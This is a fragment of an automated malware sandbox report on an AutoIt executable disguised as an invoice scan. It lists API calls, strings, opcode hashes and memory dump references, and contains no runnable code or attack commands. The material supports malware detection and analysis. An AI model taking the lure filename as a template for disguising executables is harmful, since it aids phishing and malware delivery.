                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 455545452-1403004172
                                                                              • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                              • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                              • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                              • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _strncmp
                                                                              • String ID: ,$UTF8)
                                                                              • API String ID: 909875538-2632631837
                                                                              • Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                              • Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
                                                                              • Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                              • Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _strncmp
                                                                              • String ID: ,$UTF8)
                                                                              • API String ID: 909875538-2632631837
                                                                              • Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                              • Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
                                                                              • Opcode Fuzzy Hash: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                              • Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • wsprintfW.USER32 ref: 004560E9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend_mallocwsprintf
                                                                              • String ID: %d/%02d/%02d
                                                                              • API String ID: 1262938277-328681919
                                                                              • Opcode ID: 6f0300f69b2e417eb2941b05fd198bac596540c0f64dad80bfe88e34e38ee896
                                                                              • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                              • Opcode Fuzzy Hash: 6f0300f69b2e417eb2941b05fd198bac596540c0f64dad80bfe88e34e38ee896
                                                                              • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                              • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                              • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                              • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                              • PostMessageW.USER32(00000000), ref: 00442247
                                                                                • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                              • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                              • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                              • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                              APIs
                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Message_doexit
                                                                              • String ID: AutoIt$Error allocating memory.
                                                                              • API String ID: 1993061046-4017498283
                                                                              • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                              • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                              • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                              • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E